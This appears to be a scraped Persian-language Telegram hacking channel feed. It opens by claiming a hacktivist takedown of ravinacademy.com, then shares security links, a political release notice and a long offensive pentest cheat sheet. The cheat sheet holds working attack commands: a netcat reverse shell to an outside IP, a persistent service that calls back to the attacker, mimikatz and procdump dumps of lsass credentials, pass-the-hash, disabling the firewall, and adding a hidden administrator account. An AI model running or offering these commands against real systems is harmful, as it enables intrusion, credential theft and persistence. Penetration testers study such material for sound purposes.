Target : https://ravinacademy.com | Down
Result : https://check-host.net/check-report/d9dd8c0kca3
ای جوجه هکر چاقال :)
Ravinacademy.com hacked
#OpIran
#Mahsa_Amini
@pfksecurity
ای جوجه هکر چاقال :)
Ravinacademy.com hacked
#OpIran
#Mahsa_Amini
@pfksecurity
Checklist - Local Windows Privilege Escalation.
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
@pfksecurity
https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation
@pfksecurity
برگه تقلب Nmap - راهنمای مرجع:
https://securitytrails.com/blog/nmap-cheat-sheet
#Nmap #Cheatsheet
@pfksecurity
https://securitytrails.com/blog/nmap-cheat-sheet
#Nmap #Cheatsheet
@pfksecurity
افشای آسیب پذیری - فقط مشترک شوید و با یک کلیک روی هر فروشنده/محصولی، هشدارهای ایمیلی را به محض انتشار یا به روز رسانی CVE دریافت خواهید کرد.
CVE
اعلانها را به گونهای قالببندی میکند که میتوانید به سرعت متوجه شوید که فروشندگان و محصولات تحت تأثیر کدامند.
https://cve.reconshell.com
@PfkSecurity
CVE
اعلانها را به گونهای قالببندی میکند که میتوانید به سرعت متوجه شوید که فروشندگان و محصولات تحت تأثیر کدامند.
https://cve.reconshell.com
@PfkSecurity
CVE-2022-4116 : Quarkus Java framework - Remote Code Execution
https://joebeeton.github.io
#CVE
@PfkSecurity
https://joebeeton.github.io
#CVE
@PfkSecurity
روتکیتهای خارقالعاده: و کجا میتوان آنها را پیدا کرد (قسمت 1)
https://www.cyberark.com/resources/threat-research-blog/fantastic-rootkits-and-where-to-find-them-part-1
مخزن: https://github.com/cyberark/malware-research/tree/master/FantasticRootkits
#rootkit
@Pfksecurity
https://www.cyberark.com/resources/threat-research-blog/fantastic-rootkits-and-where-to-find-them-part-1
مخزن: https://github.com/cyberark/malware-research/tree/master/FantasticRootkits
#rootkit
@Pfksecurity
Cyberark
Fantastic Rootkits: And Where to Find Them (Part 1)
Introduction In this blog series, we will cover the topic of rootkits — how they are built and the basics of kernel driver analysis — specifically on the Windows platform. In this first part, we...
https://portswigger.net/blog/the-burp-challenge
دوتا چالش جدید گذاشته که در این چالش به شما گواهینامه رایگان میده و جایزه های ارزشمند اگر موفق به حل این دو چالش شدید یک رایت اپ بنویسید و پروفایل خودتون برای ما ارسال کنید عضو کانال ctf ما بشید
@PfkCtfbot
@pfksecurity
دوتا چالش جدید گذاشته که در این چالش به شما گواهینامه رایگان میده و جایزه های ارزشمند اگر موفق به حل این دو چالش شدید یک رایت اپ بنویسید و پروفایل خودتون برای ما ارسال کنید عضو کانال ctf ما بشید
@PfkCtfbot
@pfksecurity
PortSwigger Blog
The Burp challenge
We recently launched the Burp challenge, to give our customers a unique opportunity to demonstrate their skills with Burp Suite Professional. Not only that, but the challenges involved put your web vu
WMI Internals
بخش اول ،اصول WMI و نحوه ردیابی فعالیت WMI به فرآیند میزبان ارائه دهنده WMI (WmiPrvse.exe)، فایل اجرایی مسئول اجرای فعالیت WMI را پوشش می دهد. این پست به منظور ارائه اطلاعات مورد نیاز برای درک قسمت 2 این مجموعه است که رابطه بین WMI و COM را پوشش می دهد. همانطور که گفته شد، این پست تمام موارد مربوط به WMI را پوشش نمی دهد - برای مثال، اشتراک رویدادهای دائمی WMI.
قسمت اول 1: https://jsecurity101.medium.com/wmi-internals-part-1-41bb97e7f5eb
قسمت 2: https://jsecurity101.medium.com/wmi-internals-part-2-522f3e97709a
قسمت 3: https://posts.specterops.io/wmi-internals-part-3-38e5dad016be
#WMI
@PfkSecurity
بخش اول ،اصول WMI و نحوه ردیابی فعالیت WMI به فرآیند میزبان ارائه دهنده WMI (WmiPrvse.exe)، فایل اجرایی مسئول اجرای فعالیت WMI را پوشش می دهد. این پست به منظور ارائه اطلاعات مورد نیاز برای درک قسمت 2 این مجموعه است که رابطه بین WMI و COM را پوشش می دهد. همانطور که گفته شد، این پست تمام موارد مربوط به WMI را پوشش نمی دهد - برای مثال، اشتراک رویدادهای دائمی WMI.
قسمت اول 1: https://jsecurity101.medium.com/wmi-internals-part-1-41bb97e7f5eb
قسمت 2: https://jsecurity101.medium.com/wmi-internals-part-2-522f3e97709a
قسمت 3: https://posts.specterops.io/wmi-internals-part-3-38e5dad016be
#WMI
@PfkSecurity
Medium
WMI Internals Part 1
Understanding the Basics
🧪 WEB PENSTING 🧪
Nmap Full Web Vulnerable Scan
Forward remote port to local address
# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
#Web #Pentest
@PfkSecurity
Nmap Full Web Vulnerable Scan
cd /usr/share/nmap/scripts/
wget https://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target
Dirb Dir Bruteforce:dirb https://IP:PORT /usr/share/dirb/wordlists/common.txt
Nikto web server scannernikto -C all -h https://IP
WordPress Scannergit clone https://github.com/wpscanteam/wpscan.git && cd wpscan
./wpscan –url https://IP/ –enumerate p
HTTP Fingerprintingwget https://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip
cd httprint_301/linux/
./httprint -h https://IP -s signatures.txt
SKIP Fish Scannerskipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u https://IP
Nmap Ports Scannmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC 192.168.31.10-12 (all scan default)
NC Scanningnc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done
Unicornscanus -H -msf -Iv 192.168.56.101 -p 1-65535
us -H -mU -Iv 192.168.56.101 -p 1-65535
-H resolve hostnames during the reporting phase
-m scan mode (sf - tcp, U - udp)
-Iv - verbose
Xprobe2 OS fingerprintingxprobe2 -v -p tcp:80:open IP
Samba Enumerationnmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
SNMP Enumerationsnmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP
Windows Useful cmdsnet localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits
PuTTY Link tunnelForward remote port to local address
plink.exe -P 22 -l root -pw "1234" -R 445:127.0.0.1:445 IP
Meterpreter portfwd# https://www.offensive-security.com/metasploit-unleashed/portfwd/
# forward remote port to local address
meterpreter > portfwd add –l 3389 –p 3389 –r 172.16.194.141
kali > rdesktop 127.0.0.1:3389
Enable RDP Accessreg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable
Turn Off Windows Firewallnetsh firewall set opmode disable
Meterpreter VNC\RDPrun getgui -u admin -p 1234
run vnc -p 5043
Add New user in Windowsnet user test 1234 /add
net localgroup administrators test /add
Mimikatz usegit clone https://github.com/gentilkiwi/mimikatz.git
privilege::debug
sekurlsa::logonPasswords full
Passing the Hashgit clone https://github.com/byt3bl33d3r/pth-toolkit
pth-winexe -U hash //IP cmd
orapt-get install freerdp-x11
xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP#Web #Pentest
@PfkSecurity
OffSec
Portfwd - Metasploit Unleashed
Much like the port forwarding techniques used with an ssh connection, Metasploit's portfwd will relay TCP connections to and from connected machines.
❤️🔥 امیرعماد میرمیرانی(جادی) فعال حوزه تکنولوژی، که دو ماه پیش بازداشت شده بود با قید وثیقه آزاد شد.
به امید آزادی تمامی زندانیان سیاسی
@pfksecurity
به امید آزادی تمامی زندانیان سیاسی
@pfksecurity